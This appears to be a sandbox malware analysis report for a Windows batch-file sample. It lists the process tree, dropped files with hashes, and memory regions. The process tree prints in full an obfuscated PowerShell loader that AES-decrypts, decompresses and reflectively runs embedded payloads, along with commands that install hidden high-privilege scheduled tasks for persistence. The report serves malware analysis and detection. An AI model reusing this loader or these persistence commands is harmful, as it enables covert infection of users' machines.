C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2036
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2572
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:696
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2136
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:3492
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_612_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_612.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3276 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_612.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_612.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file7⤵PID:2008
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_612.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_612.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:4744 -
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5060 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2768
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
PID:244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3472
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3884
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4008
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4024
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4380
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4904
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:588
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3288
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4448
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1908
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3296
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD55dc9a9599fb11ee70f9164d8fea15abf
SHA185faf41a206f3fa8b469609333558cf817df2cda
SHA2563f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de
SHA512499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5229c0a92ebbe835620db89a2a51d4e58
SHA1947e4ea585c39e987e4c4332fcc95ff2e344a000
SHA2563ec5266144479c44d3dab09d507a1e7cb99d4944bd8b7afbb8e59126233cdf92
SHA5126fb7bc3237ea9eadc2da39051b737c2caf6ffe58fff0d62ac605e58913c13660ab55142824e8a4be9c3347353bf7c086ee84cd482e810e9fcce2086c1f42343a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4ish412.ebs.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exeFilesize
411KB
MD5bc4535f575200446e698610c00e1483d
SHA178d990d776f078517696a2415375ac9ebdf5d49a
SHA25688e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122
SHA512a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717
-
C:\Users\Admin\AppData\Roaming\startup_str_612.batFilesize
515KB
MD54c2a3be3d5c9464eb441677e41f44fd8
SHA1c826034a0882d21a39056d745e88622ee9698343
SHA25645e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
-
C:\Users\Admin\AppData\Roaming\startup_str_612.vbsFilesize
115B
MD5689d28377ba46179472661a33b94321a
SHA1cfc638246241e4694e364a8c7ffa0e6fef3fe4e6
SHA25604939dde6dd0a305d7d06ca18eff8f61e801b37234946403594bfe37be72ca29
SHA5124b4d009d99d9b2a5063596c4ab1aea1ff65e9b512b708a5354f7554be2275884f31dc4839969a1c62fe6f953cebfb1a472f8001a192dcdd51f05c6dc83951ba5
-
memory/436-162-0x00000259D8A20000-0x00000259D8A4B000-memory.dmpFilesize
172KB
-
memory/436-163-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmpFilesize
64KB
-
memory/436-156-0x00000259D8A20000-0x00000259D8A4B000-memory.dmpFilesize
172KB
-
memory/460-167-0x0000027669BA0000-0x0000027669BCB000-memory.dmpFilesize
172KB
-
memory/480-76-0x0000000004ED0000-0x0000000004EE2000-memory.dmpFilesize
72KB
-
memory/480-77-0x0000000007740000-0x000000000777C000-memory.dmpFilesize
240KB
-
memory/480-73-0x0000000007380000-0x00000000073EC000-memory.dmpFilesize
432KB
-
memory/480-74-0x0000000007490000-0x0000000007522000-memory.dmpFilesize
584KB
-
memory/644-129-0x000001FD250F0000-0x000001FD2511B000-memory.dmpFilesize
172KB
-
memory/644-130-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmpFilesize
64KB
-
memory/644-123-0x000001FD250F0000-0x000001FD2511B000-memory.dmpFilesize
172KB
-
memory/644-122-0x000001FD250F0000-0x000001FD2511B000-memory.dmpFilesize
172KB
-
memory/644-121-0x000001FD250C0000-0x000001FD250E5000-memory.dmpFilesize
148KB
-
memory/700-141-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmpFilesize
64KB
-
memory/700-134-0x0000024E46D90000-0x0000024E46DBB000-memory.dmpFilesize
172KB
-
memory/700-140-0x0000024E46D90000-0x0000024E46DBB000-memory.dmpFilesize
172KB
-
memory/996-152-0x00007FFADE390000-0x00007FFADE3A0000-memory.dmpFilesize
64KB
-
memory/996-145-0x000002948BDD0000-0x000002948BDFB000-memory.dmpFilesize
172KB
-
memory/996-151-0x000002948BDD0000-0x000002948BDFB000-memory.dmpFilesize
172KB
-
memory/1156-108-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1156-118-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1156-114-0x00007FFB1E300000-0x00007FFB1E509000-memory.dmpFilesize
2.0MB
-
memory/1156-113-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1156-111-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1156-115-0x00007FFB1C9A0000-0x00007FFB1CA5D000-memory.dmpFilesize
756KB
-
memory/1156-109-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1156-110-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2644-104-0x000002CDEED90000-0x000002CDEEDB2000-memory.dmpFilesize
136KB
-
memory/2644-106-0x00007FFB1E300000-0x00007FFB1E509000-memory.dmpFilesize
2.0MB
-
memory/2644-105-0x000002CDEF120000-0x000002CDEF14A000-memory.dmpFilesize
168KB
-
memory/2644-107-0x00007FFB1C9A0000-0x00007FFB1CA5D000-memory.dmpFilesize
756KB
-
memory/3276-35-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3276-26-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3276-36-0x0000000006250000-0x0000000006284000-memory.dmpFilesize
208KB
-
memory/3276-47-0x0000000006230000-0x000000000624E000-memory.dmpFilesize
120KB
-
memory/3276-38-0x0000000070750000-0x000000007079C000-memory.dmpFilesize
304KB
-
memory/3276-25-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3276-48-0x0000000006E50000-0x0000000006EF4000-memory.dmpFilesize
656KB
-
memory/3276-55-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3276-49-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3276-52-0x00000000071D0000-0x00000000071E1000-memory.dmpFilesize
68KB
-
memory/3276-51-0x0000000007240000-0x00000000072D6000-memory.dmpFilesize
600KB
-
memory/3276-50-0x0000000007030000-0x000000000703A000-memory.dmpFilesize
40KB
-
memory/3276-37-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3552-19-0x0000000008070000-0x00000000086EA000-memory.dmpFilesize
6.5MB
-
memory/3552-16-0x0000000006380000-0x00000000066D7000-memory.dmpFilesize
3.3MB
-
memory/3552-7-0x0000000006310000-0x0000000006376000-memory.dmpFilesize
408KB
-
memory/3552-6-0x0000000005B30000-0x0000000005B96000-memory.dmpFilesize
408KB
-
memory/3552-5-0x0000000005A90000-0x0000000005AB2000-memory.dmpFilesize
136KB
-
memory/3552-4-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3552-3-0x0000000005BF0000-0x000000000621A000-memory.dmpFilesize
6.2MB
-
memory/3552-2-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3552-1-0x0000000003450000-0x0000000003486000-memory.dmpFilesize
216KB
-
memory/3552-0-0x000000007456E000-0x000000007456F000-memory.dmpFilesize
4KB
-
memory/3552-17-0x0000000006810000-0x000000000682E000-memory.dmpFilesize
120KB
-
memory/3552-18-0x00000000068C0000-0x000000000690C000-memory.dmpFilesize
304KB
-
memory/3552-20-0x0000000006DF0000-0x0000000006E0A000-memory.dmpFilesize
104KB
-
memory/3552-75-0x0000000074560000-0x0000000074D11000-memory.dmpFilesize
7.7MB
-
memory/3552-21-0x0000000002FF0000-0x0000000002FF8000-memory.dmpFilesize
32KB
-
memory/3552-22-0x0000000007A90000-0x0000000007AF2000-memory.dmpFilesize
392KB
-
memory/3552-23-0x0000000009CA0000-0x000000000A246000-memory.dmpFilesize
5.6MB
-
memory/5060-95-0x0000000006C50000-0x0000000006C96000-memory.dmpFilesize
280KB